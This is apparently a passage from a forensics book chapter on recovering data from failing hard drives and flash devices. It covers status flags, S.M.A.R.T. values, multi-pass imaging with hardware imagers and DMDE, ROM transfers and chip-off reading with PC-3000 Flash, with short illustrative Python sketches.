Hard drives have a safe mode that they go into if some part of the firmware is corrupt. This manifests as multiple clicks, shutting down and restarting the motor, and then starting again. Smaller 2.5" laptop drives often just shut down and don't try multiple times. PC-3000 recognizes this problem itself and shows us that a hard disk is in safe mode. You can also put a hard drive into safe mode on purpose. The hard disk then waits for suitable firmware to be uploaded to its RAM; this is also referred to as a "loader". Once the loader has been successfully uploaded and is running, you can start repairing corrupted firmware modules.
Status and error registers

Besides the noise and behaviour of a drive, there is status information which can be displayed by some data recovery tools like the DDI, MRT, PC-3000, and DFL. There are also some free tools which show these status flags, like Victoria²⁷³ or Rapid Disk Tester²⁷⁴.

12.3 - status flags from MRT

These status flags also help with diagnostics:

• BSY ("busy") indicates that the disk is working. It is OK to leave an HDD or SSD on BSY for a while and wait, as long as the disk isn't making any weird noises! BSY is the first status that the HDD shows before the firmware is fully loaded. (Here I monitor an SSD with a thermal camera and an HDD with a stethoscope.)
• DRD ("drive ready") means that the hard disk is ready to receive commands.
• DSC ("drive seek complete") indicates that the head has moved to a specific position.
• DWF ("drive write fault") should always be off.
• DRQ ("data request") is set when the data carrier is ready to transfer data.
• CRR ("corrected data") should always be off.
• IDX ("index") should always be off.
• ERR ("error") indicates that an error occurred with the previous command. The error is then described in more detail by one of the following error codes:
  • BBK (bad block)
  • UNC (uncorrectable data error)
  • INF (ID not found)
  • ABR (aborted command)
  • T0N (Track 0 not found)
  • AMN (Address marker not found)

The abbreviations can differ from tool to tool.

Diagnosing the issue

Until now you have learned how to get a better picture of the inner processes of an HDD, so it's time to use that knowledge practically…

²⁷³https://hdd.by/victoria/
²⁷⁴https://www.deepspar.com/training-downloads.html
It would be hard to describe some of the sounds you may hear when a drive has a certain issue – luckily, a data recovery lab has recorded a lot of sound samples and offers them on their homepage. You can find the files here²⁷⁵.

If a disk spins up but then gets stuck in the BSY state, this indicates that parts of the firmware are corrupt or unreadable, or that background processes are running on the hard disk that hang or take a long time to finish. It can also be due to issues reading the firmware from the platters. If the drive sounds OK, wait a few minutes and see if the drive comes ready. If a drive is not ready within 10-15 minutes, it's highly unlikely it will become ready if you wait longer. Most likely you will need a firmware tool and the proper knowledge to deal with that issue.

If a disk reports readiness but shows unusual values – e.g. 0 GB or 3.86 GB for the capacity – then an essential part of the firmware may be corrupted, or only the part from the ROM chip could be read. It's also possible that the ROM chip is wrong (e.g. an amateur attempted a data recovery and simply swapped the PCB), or the head is damaged and can't read the data from the service area, or an early-loaded firmware module is corrupted.

If the head keeps clicking, it can sometimes indicate a firmware problem or the wrong ROM chip on the PCB. Much more likely, though, the head is defective and cannot find the service area because it can no longer read anything. I've also seen these symptoms when the ROM chip was defective. The more experience you gain, the better you will be at matching noises, status LEDs and other indications from the hard drive to a specific problem. You don't learn data recovery overnight!

Before cloning the drive, try to read the first sector; if that works, read the last sector and at least one sector in the middle of the disk. If you can read the drive up to a specific LBA and the sectors after that LBA are unreadable, it could be either a defective head or the translator (sometimes also called the address decoder). With a defective head, you can read up to some point, then you hit a group of unreadable sectors, and after the sectors belonging to the defective head you can read data again. If the translator is damaged, you can't read a single sector past a certain LBA. To test which issue you are facing, you can try to read more sectors (maybe 10 or 15) distributed across the entire surface.

Another good indication is the S.M.A.R.T. data. The fact that you can read the S.M.A.R.T. values at all means that the heads are good enough to read at least the service area, and it also means that the firmware is loaded at least up to the S.M.A.R.T. module – which means basically all the critical modules are loaded. The values themselves tell you more important information:

• 0x05 (Reallocated Sectors Count) tells you how many bad sectors have been reallocated.
• 0x0A (Spin Retry Count) tells you how often the drive had to try multiple times to spin up until it reached the desired RPM. This can indicate a mechanical problem.

²⁷⁵https://datacent.com/failing_hard_drive_sounds
• 0xBB (Reported Uncorrectable Errors) tells you how many errors could not be corrected by ECC. This can indicate fading of the magnetic charge on the platters after the drive has not been used for a long time, or degradation of the head or the magnetic coating.
• 0xBC (Command Timeout) tells you how often a timeout occurred while trying to execute a command. This can indicate problems with the electronics or oxidized data connections.
• 0xC4 (Reallocation Event Count) tells you how many sector reallocations were attempted, successfully and unsuccessfully.
• 0xC5 (Current Pending Sector Count) tells you how many sectors are waiting for reallocation. This value is very important for forensics! If the drive is idle for longer than 20 seconds, these sectors can get reallocated, which could alter data.
• 0xC6 (Uncorrectable Sector Count) tells you how many sectors could not be corrected by ECC. The same as for 0xBB applies here.
• 0xC9 (Soft Read Error Rate) tells you how many uncorrectable soft read errors occurred. The same as for 0xBB applies here.

Seen in the context of 0x09 (Power-On Hours Count), you can conclude whether the errors indicate a production issue and therefore a likely rapid degradation of the drive (small number of hours), or normal degradation over time if the drive has been in use for many hours.

The forensic importance of S.M.A.R.T. data

I recommend getting the S.M.A.R.T. values before and after imaging. As you have learned by now, the drive will reallocate bad sectors when it stays idle too long. This can cause big issues when someone else calculates the checksum of the drive and it does not match the checksum in your report. Even if you take care that the drive is never idle, some other investigator may let the drive idle for a few minutes before calculating the checksum, and thus that person alters the data. In such cases it's wise to have the S.M.A.R.T. values recorded before and after imaging so that you can explain why the checksums no longer match.

In a data recovery case, some drives may have trouble starting up due to a minor scratch in the service area, which is very hard on the head during start-up. So you would not want to start the drive multiple times, as you cannot know whether the head or drive will survive the next start. If you are not able to deactivate background processes like the reallocation of sectors, it is in some cases necessary to accept the smaller risk and rather lose a few sectors than the whole drive. Of course, the best approach would be to outsource such a case to a professional data recovery lab, but this is not always an option.
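Putting the recommendation into practice: one simple way to record the S.M.A.R.T. state before and after acquisition is to save the full output of smartctl (from the free smartmontools package) into timestamped files. A minimal sketch, assuming smartmontools is installed and the evidence drive appears as /dev/sdb (a placeholder):

```python
# Minimal sketch: record S.M.A.R.T. data before and after imaging so a
# later checksum mismatch can be explained. Assumes smartmontools is
# installed; /dev/sdb is a placeholder for the evidence drive.
# Running smartctl typically requires root privileges.
import subprocess
from datetime import datetime, timezone
from pathlib import Path

def snapshot_smart(device: str, label: str, outdir: Path = Path(".")) -> Path:
    """Save `smartctl -x` output for `device` into a timestamped file."""
    stamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%SZ")
    outfile = outdir / f"smart_{label}_{stamp}.txt"
    result = subprocess.run(
        ["smartctl", "-x", device],   # -x: all SMART and device information
        capture_output=True, text=True,
    )
    outfile.write_text(result.stdout)
    return outfile

# Usage around an imaging job:
before = snapshot_smart("/dev/sdb", "before_imaging")
# ... run the imaging passes here ...
after = snapshot_smart("/dev/sdb", "after_imaging")
print(f"Compare {before} and {after}, e.g. the 0x05 and 0xC5 counters.")
```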
Imaging of unstable HDDs

The imaging of unstable HDDs follows an easy approach: first you grab the low-hanging fruit at a low stress level for the drive, and then you fill the gaps and read the problematic areas. In more technical terms, you need multiple imaging passes. In the first pass you use a small read timeout (300–600 ms) so that the head does not work too long on bad sectors. The reading process will then look like this:

12.4 - Simplified graphical representation of the read process

If the data is delivered by the drive before the read timeout occurs, you save the data and continue with the next block. If the timeout is reached, the imaging device sends a reset command to cancel the internal read retries of the drive, and the imaging continues with the next block. That is why the read timeout is the most important setting for handling unstable drives! The longer a head works on bad sectors, the more damage it can accumulate over time.

Some drives have larger areas of bad sectors – in such cases it is wise to skip a certain number of sectors after a read error to get past the bad areas faster. If you don't know whether the drive has experienced a drop or head crash, you can't be sure there is no minor scratch on the surface. That's why, in my first imaging passes, I always set a high number of sectors to skip (e.g. 256000) after a read error. This ensures that you skip over bad areas or tiny scratches very quickly.

Once you have read all good sectors with a short read timeout, you can run the next imaging pass with a longer timeout and re-read all blocks which were skipped in the previous pass. If a pass produces mainly skipped blocks and only occasionally read blocks, you have to increase the timeout until you read at least 2/3 of the blocks. As you increase the read timeout with each pass, you should decrease the number of sectors skipped after a read timeout or read error with each pass.
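To make the pass logic concrete, here is a heavily simplified sketch of the skip-on-error strategy. It is not a replacement for a hardware imager – a plain OS read can neither enforce a true read timeout nor send reset commands to the drive – but it shows how the per-pass parameters work together. The device path, block size and skip values are illustrative:

```python
# Heavily simplified sketch of multi-pass imaging with skip-on-error.
# A real hardware imager additionally enforces the read timeout and
# resets the drive; a plain os.pread cannot do that.
import os

SECTOR = 512

def imaging_pass(dev_fd, out_fd, total_sectors, done, block=256, skip=25600):
    """One pass: read not-yet-recovered blocks, skip `skip` sectors on error."""
    lba = 0
    while lba < total_sectors:
        if lba in done:                      # already recovered in an earlier pass
            lba += block
            continue
        try:
            data = os.pread(dev_fd, block * SECTOR, lba * SECTOR)
            os.pwrite(out_fd, data, lba * SECTOR)
            done.add(lba)
            lba += block
        except OSError:                      # bad area: leap over it
            lba += skip

src = os.open("/dev/sdb", os.O_RDONLY)       # placeholder device
dst = os.open("image.raw", os.O_RDWR | os.O_CREAT)
total = os.lseek(src, 0, os.SEEK_END) // SECTOR
recovered = set()
# Pass 1: big skips, grab the easy data first.
imaging_pass(src, dst, total, recovered, skip=25600)
# Pass 2: smaller skips, fill the gaps (a real tool also raises the timeout).
imaging_pass(src, dst, total, recovered, skip=2560)
```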
If your tool allows you to create a head map, I would strongly suggest doing that before imaging. That way, you can see if there is a weak or even a completely dead head, so you can skip the sectors of that head in the first pass.

If a drive is not identified but gets stuck in BSY, it may be one of the commands used to initialize the drive that causes it to hang. That's why DDI allows you to configure the commands used to initialize the drive. Sometimes a non-standard initialization procedure will allow a drive to become ready:

12.5 - DDI configuration of drive initialisation command sequence

If you change the identification procedure and the drive becomes ready but you cannot image a single sector, you have to try another identification procedure, so that the drive does not just become ready but also gives you data access!

Some imagers allow you to deactivate unnecessary functions of the drive like S.M.A.R.T., caching, sector reallocation, etc. Deactivating unnecessary functions makes the imaging not just a bit faster but also much gentler on the drive. If S.M.A.R.T. is enabled, the drive has to update the S.M.A.R.T. data each time it hits a bad sector. This forces the head to jump to the service area and write data, and that is not just more "stress" for the drive but also a risk: if the drive writes bad data into the firmware module, it can develop a firmware issue and no longer boot. Alternatively, the module can grow too big and damage the following module in the service area, resulting in the same problem. DDI has an option in the menu to deactivate such functions (Source -> Drive Preconfiguration). This option deactivates features based on a preset from DDI, but it doesn't allow you to select specific items. A fully fledged firmware tool like MRT will allow you to do that:
12.6 - MRT edit HDD ID dialogue

The next possible setting is the read mode. You can use the faster UDMA modes or the older and slower PIO mode, if your hardware imager (e.g. DDI, MRT, DFL or PC-3000) allows you to set these options:
12.7 - MRT read mode selection for an imaging task
12.8 - DFL DE read mode selection for an imaging task

The other modes, like "Read, ignore CRC", are helpful in some cases – and here DDI does a fabulous job. MRT does exactly what the name suggests: it reads the data and writes it to the image or target drive whether or not the checksum of the sector matches. DDI, in this mode, reads the sector multiple times and does a statistical analysis for each bit to get the most probable result instead of the first result the drive delivers. Either way is useful when the sector checksum is corrupted. When a very weak head gives you bad data, the statistical analysis of DeepSpar's DDI ensures that you get the best possible result, but the trade-off is a longer imaging duration and much more stress on the head. That's why this is not an option you should use on the first pass, but rather on the last imaging pass!

The idea behind using a slower read mode is simple: an unstable drive may read more reliably at a slower speed. There are also cases where a firmware part is damaged and the drive is highly unstable in UDMA, for example, while PIO uses another, fully functional part of the firmware. Different read commands also apply different procedures and, in some cases, you may be able to read bad sectors with another read mode. That's why I recommend using different read modes in different passes. The same applies to the read method (LBA, CHS, …)!

The last option I want to mention is the imaging direction – forward or backward. In backward imaging the drive bypasses its cache, and that's how you can overcome issues with the cache. It also makes the imaging process much slower, but slow imaging of good data is much better than fast imaging of data corrupted by the cache!

You can also see that different tools offer different levels of control and different options. If I need the ignore-CRC option, I would certainly use DDI rather than MRT, and DFL would not give me that option at all. For read-mode control, however, DFL gives me more granular control.
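To illustrate the statistical idea behind DDI's multi-read mode, the sketch below re-reads a sector several times and keeps, for each bit, the value that occurred most often. This is only a conceptual model of majority voting, not DeepSpar's actual implementation; read_sector_once stands in for whatever raw-read mechanism is available:

```python
# Conceptual sketch of per-bit majority voting over multiple reads of
# the same unstable sector. Not DeepSpar's actual implementation.
from typing import Callable

def majority_vote_sector(
    read_sector_once: Callable[[], bytes],  # hypothetical raw-read callback
    attempts: int = 7,
    sector_size: int = 512,
) -> bytes:
    """Re-read a sector `attempts` times; keep the most frequent value per bit."""
    bit_counts = [0] * (sector_size * 8)     # how often each bit read as 1
    for _ in range(attempts):
        data = read_sector_once()
        for i, byte in enumerate(data):
            for bit in range(8):
                if byte & (1 << bit):
                    bit_counts[i * 8 + bit] += 1
    result = bytearray(sector_size)
    for pos, ones in enumerate(bit_counts):
        if ones * 2 > attempts:              # bit was 1 in the majority of reads
            result[pos // 8] |= 1 << (pos % 8)
    return bytes(result)
```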
This is also why a full-blown data recovery operation needs a lot of different tools: you select the tool which fits best for each job.

There are even more options to optimise the imaging. One of them is the reset commands. You may choose between a hardware and a software reset. Some drives process one of these resets much better or faster than the other. I have even seen drives freeze when issued the "wrong" reset command.

Practical example – imaging a WD40NMZW with the Guardonix writeblocker

This is a drive I recently recovered. It is highly unstable and has a lot of bad sectors and a very weak head, because the local PC repair shop tried to recover the data by scanning the drive with a data recovery program, which took multiple days because of the drive's internal read retries. In the end the head was so damaged that Windows started to hang whenever the drive was directly connected, and after a while Windows just dropped the HDD. This is also a good example of the damage a wrong data recovery approach can cause. At least the head is not totally dead – so you have something to work with.

I thought about this example for a while, and I think the most useful tool of this kind for a forensics lab would be the USB Stabilizer. This tool is the "bigger brother" of the Guardonix writeblocker and gives you a bit more control. It can also be used with firmware tools, so if you are thinking about data recovery, this is my recommendation for the lowest-end tool you should go with. When not used for data recovery, the USB Stabilizer works as a USB writeblocker – and as you may know, basically every storage device can be adapted to USB. So, if you are starting out in forensics, this is the tool that gives you the most options.

That makes this quite an extreme example: you have the lowest-end tool and a data recovery case that would be at least a medium-to-high difficulty imaging job even for professional tools. So this will also be a good test of what the USB Stabilizer can do!

This case also gives me the opportunity to demonstrate another procedure in data recovery: a USB-to-SATA conversion for Western Digital drives. This is basically the same procedure as a PCB swap – you just swap a USB PCB for a SATA PCB. Before I explain how that's done, I want to show you what data is stored in the ROM chip on the PCB:
12.9 - List of firmware modules on a Western Digital ROM chip

As you can see in the image, modules 0x30 and 0x47 contain the service area (SA) translator and the SA adaptive parameters. These two modules make each ROM chip unique to its drive. That's why you have to transfer the ROM chip from the original PCB to the replacement PCB. This applies not just to WD drives but to every manufacturer!

To check which chip is the ROM chip, I usually search Google Images for the PCB number (2060-######-### Rev X in the case of WD PCBs) plus the word "donor". This usually brings up images from specialized retailers of donor drives and PCBs, some of whom have marked the ROM chips on their images. I also validate this by searching Google for the datasheet of the marked component. If it is indeed an SPI flash chip or something similar, you have confirmed that this component is the ROM chip.

On some PCBs there is only an empty space where the ROM chip would sit. This means the data is in the MCU (microcontroller unit), and the ROM chip is used in later revisions to patch the MCU with newer code. In those cases you have to transplant the MCU from the original PCB that lacks a ROM chip, and remove the ROM chip from the donor PCB if there is one. Usually there is also another component on the PCB which acts as a switch to activate the ROM chip; this has to be removed as well. If the original PCB has a ROM chip but the donor PCB doesn't, you have to transfer the ROM chip and that second component used as a switch.
12.10 - ROM-chip transfer for PCB-swap

This conversion is often needed for imaging, as a USB interface is not as stable as SATA, but it is also used when a PCB is damaged. Now I am using an Axagon Fastport2 adapter to connect the HDD to my USB Stabilizer. So I am basically reverting the SATA conversion I had done to image the drive with MRT. The first step is to get the drive to ID. To see if the drive is recognised, I open the Log tab and activate the power supply in the USB Stabilizer application:
12.11 - USB Stabilizer Log-tab

If you have a 3.5" drive, you can use a USB dock. In that case you have to activate power in the USB Stabilizer first and then power on the dock. Then you have to select the drive in DMDE:
12.12 - DMDE drive selection and USB Stabilizer Settings-tab

I have chosen DMDE²⁷⁶ because the tool is pretty cheap, powerful, and also great for analysing filesystems. That makes it a good choice for data recovery and even quite useful for forensics.

In the Settings tab of the USB Stabilizer application there are controls for the device type (HDD or SSD), which affects the handling of resets; the reset type (software, hardware, controller, …); and finally the read timeout. So you have the most important settings for imaging speed and the stress level of the drive, as well as for the resets which can cause instability issues. In other words, you have the most basic controls. The checkbox Turn Off Drive if Inactive is also helpful to prevent the reallocation of bad sectors from damaging data and the drive before you start another imaging pass. However, that only works with 2.5" drives, as they can be powered directly over USB and thus the USB Stabilizer can power them off. With the Commands button you can issue resets manually, or you can log the S.M.A.R.T. data, as I would suggest before and after a forensic data acquisition.

To sum it up so far: you are using the lowest-end data recovery tool with a cheap data recovery program on a case of medium to moderately high difficulty even for professional data recovery tools – a case which took a 5x more expensive and much more flexible tool over a week to image. After you select the disk, you see the following initial scan dialog:

²⁷⁶https://dmde.com
12.13 - DMDE initial scan

DMDE tries to read the first sectors, and this drive has a bad LBA 0 (MBR) which can't be read. DMDE sees that because I have set the USB Stabilizer to report read errors back to the OS, so that the software can log them correctly. This is why DMDE displays the following error:

12.14 - DMDE read error

You can select "Ignore all" and cancel the further processing of the partition table. First you want to clone the drive, and then you run the logical data recovery on the image file. DMDE allows you to control a few other parameters while imaging. First, you need to set the LBA range and the target:
12.15 - DMDE imaging settings - Source and destination

This dialog should be pretty self-explanatory. DMDE only allows you to create a RAW image. More advanced tools will let you create VHD, VHDX or other kinds of sparse files, which will save you a lot of space on the target drive. The next settings need to be made in the Parameters tab:

12.16 - DMDE imaging settings - Parameters and Source I/O Parameters

First, you should create a log file. This file stores an overview of read, unreadable and skipped sectors.
You can also select to image in reverse in that dialog. I unchecked Lock the source drive for copy, as the USB Stabilizer acts as a writeblocker anyway. For the 2nd pass you can also select here to retry bad sectors. This makes sense because many of the bad sectors will be retrieved with a longer read timeout. A click on the Parameters button opens the 2nd window. In its Ignore I/O Errors tab you can select which fill pattern should be used for bad and skipped sectors, and how many sectors will be skipped after a bad sector. This setting allows you to overcome bad areas more quickly.

From my experience with this drive, I chose 25600 for the first pass. In MRT I used 256000 on the first try, but I realized that I was skipping too many sectors and that there were bad areas all over the surface. So I was pretty certain that I was not dealing with local issues like a minor scratch. That's why, after the 15% or 20% mark, I lowered the skipped sectors in MRT to 25600 as well. I still keep the value quite big for the first pass: with a much smaller setting I had seen that the bad areas are 20000–80000 sectors wide, so 25600 was a good size to skip over them in 1 to 4 steps. As I said – get the low-hanging fruit first, because you never know if the drive may die on you in the first pass! DMDE shows you the total number of read and skipped LBAs:

12.17 - DMDE imaging progress

The Action button lets you cancel the imaging or change the I/O settings while you are imaging. That lets you fine-tune the skip settings on the fly. The Sector Map tab shows the imaging progress:
12.18 - USB Stabilizer first imaging pass

Here you can see very well how the imaging works – the spikes where the drive reads at decent speed are broken up by bad areas which get skipped. For the 2nd pass I use the following settings:
12.19 - DMDE imaging settings - Source and destination

With MRT I had used 3 passes – one with 2560 sectors skipped and a 2-3 second timeout instead of 500 ms, and then a 3rd imaging pass reading sector by sector in reverse in PIO mode with a 10 second read timeout. Here I don't have PIO, and I expected the 2nd pass to end in the middle of the night or early morning, which would throw my time comparison with MRT totally off. So I decided to go straight away with a 2560-sector skip, a 10 second read timeout, and reading the skipped sectors in reverse. Reading in reverse proceeds until the next bad sector occurs, and everything between that bad sector and the first bad sector found in the forward direction is marked as bad. This is not perfect, but it gets the job done somehow. The imaging is occasionally painfully slow, but I read basically most of the sectors:
12.20 - USB Stabilizer second imaging pass

In the end, the USB Stabilizer and DMDE imaged the first 10% of the drive in a bit more than 1.5 days, and my "1 pass instead of 2" hack caused a few more bad sectors than MRT delivered in almost exactly 1 day. The whole job would run approximately 16-17 days instead of 10, which is really good for a tool like that. I may still have some room for improvement, but I have to say I am impressed once again by DeepSpar's USB Stabilizer!

Last but not least, I would recommend cooling a drive which has to work 24 hours per day for multiple days to get imaged. An old case fan and the old power supply of a SATA-to-USB converter cable do this job in my lab.
Flash drive data recovery

Storage devices based on flash memory need to be handled differently. To understand how data recovery for such devices works, you need to understand how these devices function and how the manufacturers deal with certain limitations of the technology.

Flash drives are faster because there are no moving parts, which also eliminates any kind of mechanical failure or mechanical degradation over time. The data is stored in memory cells in the form of an electric charge. These cells degrade as data is written to them. That means the vendors have to come up with some clever ideas to prevent flash drives from failing too soon. Strongly generalized, these measures are:

• Wear leveling, which ensures that writes are distributed evenly across all memory cells.
• Obfuscation/randomisation of data, to ensure there are no patterns which could cause uneven wear within a memory page (a group of memory cells and the smallest unit that gets written to).
• A good supply of spare space to replace failing memory cells, pages or blocks (a block is a group of pages and the smallest unit that can be erased).

Board-level repair

First of all, you need to know whether the issue is hardware- or firmware-related. The easiest job is repairing a hardware defect like a broken connector or a blown/shorted capacitor. All you need for this is a soldering station, tweezers and, in most cases, a microscope.

Fully encrypted devices

Next you need to distinguish between fully encrypted and merely obfuscated devices. Basically all SSDs use full hardware encryption to obfuscate and randomize data. This is also true for a tiny fraction of pendrives. To recover data from these devices you need professional data recovery tools like:

• PC-3000 UDMA²⁷⁷/Express with the SSD plug-in (does not support NVMe SSDs)
• PC-3000 Portable III²⁷⁸ with the SSD plug-in (also supports NVMe SSDs)
• MRT Express²⁷⁹ with the SSD plug-in (supports just a few SATA SSDs)

The process, in a very generalized form, is quite easy: you short some pins on the SSD to put the device into the so-called technology mode, which allows the data recovery hardware to upload a so-called loader.

²⁷⁷https://www.acelab.eu.com/pc3000.udma.php
²⁷⁸https://www.acelab.eu.com/pc-3000-portable-iii-systems.php
²⁷⁹http://en.mrtlab.com/mrt-pro
This loader restores access to the data if the device is supported. The good news is that many devices nowadays are based on the same controllers (e.g. Phison), but you are still very far from the over 90% success rate a data recovery lab can reach with HDD cases. If the device is not supported, an investigator could theoretically reverse-engineer the firmware of a working model and try to find the issue. This is basically what the vendors of data recovery tools do. To do that for a single case would be an enormous amount of work and would not fit within the budget and/or time frame of a normal investigation. So, if the device is not supported, you are usually out of luck. Without somewhat working firmware that handles the decryption of data and the translation from LBA addresses to the correct memory location, you are not able to get any data at all.

Chip-off data recovery

Most pendrives and memory cards do not have hardware encryption. This is the reason why these devices can be handled with a so-called chip-off data recovery. As the name suggests, the memory chips get removed and you read the data directly from the NAND chips. If you do so, you have to reverse everything that was done to the data when it was recorded. This is usually the job of the controller, but if you are doing a chip-off you bypass the controller and have to do its work yourself.

I will demonstrate the process with PC-3000 Flash²⁸⁰ and a pendrive chip-off recovery. I chose PC-3000 Flash because Ace Lab offers the best support in the data recovery field and PC-3000 Flash comes with a large database of already known working solutions. This makes it much easier to get started! The only available alternative is VNR from Rusolut²⁸¹. This tool doesn't offer a database of already known solutions, but it is very sophisticated and powerful. The third vendor (Flash Extractor) went out of business; the tool is only available second-hand and there is no professional support or further development anymore. That's why I would not recommend it at all. The process is basically the same with all tools, but the way a case is handled differs. If you understand the general process, you will be able to work with each tool!

Desoldering and preparation

First you have to desolder the memory chip:

²⁸⁰https://www.acelab.eu.com/pc3000flash.php
²⁸¹https://rusolut.com/
12.21 - pendrive with one NAND chip and USBest controller

This is a very old USB pendrive with a USBest controller (model UT163-T6). Since the controller model was hard to read, I used a little trick: I painted the surface of the controller with a paint pen and then carefully cleaned the surface with a swab dipped in 99% isopropyl alcohol. After this, only a little paint remains in the recesses of the controller and the text is very easy to read.

Here you have a TSOP48 chip. This package has 48 legs (24 on each side) and is by far the most commonly used design for NAND chips. This is simply due to the fact that this design does not require any special additional equipment for pick-and-place machines and thus saves manufacturers additional investments. For desoldering I use my Yihua YH-853AAA all-in-one soldering station:
12.22 - Yihua YH-853AAA with pendrive after desoldering of the chip

This soldering station offers a soldering iron, a preheating plate and a hot air nozzle in one. For small boards such as USB sticks or SD memory cards, I usually use a "third hand" to hold the board. This makes it easier to fix the small boards in the right place.

First, I activate the preheating plate and let it heat up to 180°C. At the same time, I put a little flux on the contacts, and as soon as the 180°C has been reached, I activate the hot air nozzle at about 200°C for 30-40 seconds. I do not use an attachment on the hot air nozzle for larger components like this TSOP48 chip. For TSOP48 chips there are also special attachments that direct the hot air primarily onto the legs; I would recommend these to beginners to make the process even gentler. The procedure I describe is actually intended for BGA chips, which do not have legs but pads on the underside of the chip – but I handle TSOP chips this way too…

Then I swing the hot air nozzle away and use the soldering iron with a little leaded solder to lower the melting point of the lead-free solder on the board. To do this, I quickly go over the contacts with leaded solder at a set temperature of 400°C. Then I swing the hot air nozzle back, increase the temperature at my hot air station to about 380°C, and use a fairly low air flow to avoid blowing small components off the board! To pick up the chip, I then use a vacuum lifter.
I recommend you practice this with an old pendrive. If you can solder the chip out and back in several times with the stick still working afterwards, you are ready for the first real cases. Do not take the values I mentioned as given, but find the right values for your own soldering station! The temperature specifications depend on the sensor and the position of the sensor. I know from an experiment with a thermal imaging camera that a setting of 400°C corresponds to about 350°C at the tip of my soldering iron. Depending on the distance and other factors, the set temperature can differ greatly from the temperature acting on the chip. In general, you want to solder hot enough that you can remove the chip in a few seconds, rather than heating the chip at 300°C for multiple minutes. Therefore, it is important to find suitable settings on your own soldering station. But you don't want to solder so hot that chips get damaged!

With more expensive soldering stations, the set values will tend to be closer to the actual values. My Yihua station is a quite cheap but also very compact model and has served me well for years. You are welcome to invest a 4-digit sum in Weller or JBC equipment, but for the amount of soldering work I do, it would be overkill. A training phase to get to know the equipment will be necessary even with high-quality soldering stations…

As soon as the chip is removed, it is necessary to clean the contacts. I use a small piece of desoldering wick that I cut off. Copper is a good conductor of heat, and you want to clean the contacts with the desoldering wick, not heat 3 meters of it. That's exactly why I cut off a 1.5-2 cm long piece. I place the chip on a silicone soldering mat, put some flux on the legs and then lay the desoldering wick on the legs. Then I use the soldering iron at the previously mentioned 400°C setting with a slightly wider chisel tip to transfer as much heat as possible. Do not try to push the wick back and forth – you would risk bending the legs. Also make sure to heat the desoldering wick continuously before removing it, so that it does not stick to one of the legs. If you have problems detaching the desoldering wick from the legs, don't use force; use the hot air nozzle at 300°C to "help" the soldering iron. This allows you to remove the desoldering wick within seconds.

With BGA chips, the desoldering wick can easily be pushed over the pads if it has the right temperature. Do not apply force here either! The pads are torn off faster than you think! As soon as the right temperature is reached and enough flux is used, the piece of desoldering wick glides over the contacts as if by itself. After both sides of the legs are free of solder, I use a very soft toothbrush and a few drops of isopropyl alcohol to clean the chip roughly. Then I use cotton swabs dipped in IPA to clean the silicone mat and the chip.
Afterwards the chip can be inserted into the reader. Alternatively, you can tin the matching adapter board and solder the chip onto it. I always use leaded solder to keep the soldering temperature a little lower.

If a TSOP48 chip is not detected in the corresponding adapter, this may be due to residues of rosin-containing fluxes or oxidation of the legs. In this case, it is often helpful to place the chip with the legs facing down on a hard surface and carefully clean the tops of the legs with a scalpel:

12.23 - Cleaning TSOP-48 legs with a scalpel

For data recovery, I note the last two digits of the case number on the chip. For this book I used single-digit numbers for the examples, in order not to confuse these chips with a real data recovery! Each chip has a marking for pin 1, an Arabic numeral for the case and a Roman numeral for the chip position on the PCB.

Practical example - chip-off recovery for an old 512MB pendrive

Once the chips have been prepared, you can read them with PC-3000 Flash. To do this, you must first create a new case. When you start the PC-3000 Flash software, you see the following dialog:
12.24 - Select adapter dialog

Here you tick Use adapter and then click OK. In the next step you are asked for a folder name for the case:

12.25 - Setting the case name
I always name the folder with the case number and the prefix DR for a data recovery or FI for a forensic investigation. Here I use DR_12345 as an example. Then you have to determine where the data should be read from:

12.26 - Device selection dialog

Here you can either select the PC-3000 Flash Reader (first line) or a USB device, like the DeepSpar USB Stabilizer shown here. So you can easily use PC-3000 Flash for a logical data recovery as well. You could also load a dump from a file. I use the USB chip reader for this example. Confirm the selection with Next>. In the next step, you need to provide the key data of the case:
12.27 - Set controller and number of chips

The translation from Russian is not always perfect. The first field, Number of chip, should actually be called "Number of chips", because you have to specify the total number of chips, not the position of the chip you are going to read. Once set, this information can no longer be adjusted! The specification of the controller is important later for searching the Solution Center for an already known solution… By clicking Next> you confirm these entries. In the last step, you can enter more information for the case:
12.28 - Set additional information/notes

By clicking OK you create the case and open it immediately:

12.29 - Read the chip ID
In this case, you see only one chip, as you specified before. If you had specified a larger number of chips, you would now have several chips in the list that you would need to fill with data. PC-3000 Flash is very context-menu driven. The first step in creating the dump is to read the ID of the chip. Via the ID, PC-3000 Flash recognizes which settings are necessary for reading the chip. To do this, you right-click on 1 – Unknown chip. This brings up the context menu as shown above. In it you select the entry Read chip ID, and then the following dialog appears:

12.30 - Chip ID found

The appropriate values have already been set by the adapter you used, and usually there is no need to activate further options. The read process starts automatically and all possible modes are tried. If the ID is read successfully, the window disappears. If there are read errors, they are displayed as red lines. There are partial read errors, in which some values are found, and full read errors as shown below, where not a single value is determined for Chip ID, Parts or Base:
12.31 - Chip ID reading error

In this case, you should clean the chip with a scalpel as previously mentioned. If that does not help, the chip is most probably dead and there is no way to recover the data. If the ID is recognized, the chip name changes:

12.32 - Read chip

With a right-click you get the context menu again, and then you need to select Read chip to start the first reading pass:
12.33 - Reading mode selection dialog

The dialog shown above allows you to select the reading mode. The Direct reading mode is only intended for testing the reading options and should therefore only be used in exceptional cases. Normally you select Reading to file dump to write the data from the chip to a file. Then you confirm this with Select.

12.34 - Reading parameters dialog (normal)

In this step, you choose the reading speed and some more settings. You get to the advanced settings by clicking on Extended>>:
12.35 - Reading parameters dialog (extended)

Here you can already perform some analysis or verification of the data while reading, or restart the chip with a power reset after a read error. I'm not a fan of running the analyses while copying the data. Auto-verification may make sense for some chips, because the data is read several times and then the most likely result is stored. As a rule, though, ECC correction and re-reading work better! A click on Apply starts reading:
12.36 - Reading process running

Then you have to correct the data you just read by performing the ECC correction and, if necessary, re-reading the uncorrectable pages using special re-reading methods. To do this, you open the newly added item Results of preparation in the left pane and then click on the item 0001 Transformation graph. The transformation graph is the area in which you will work from now on. This is where all the transformations are carried out with which you go from a physical to a logical image.
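Conceptually, the transformation graph is just an ordered chain of functions applied to the raw dump. The following toy model in Python illustrates the idea; the two example steps (undoing bitwise inversion and removing service areas) correspond to transformations discussed later in this chapter, and everything else about the model is a simplification of what PC-3000 Flash does internally:

```python
# Toy model of a transformation graph: an ordered chain of steps that
# turns a physical NAND dump into a logical image.
from typing import Callable

Transform = Callable[[bytes], bytes]

def invert_bits(dump: bytes) -> bytes:
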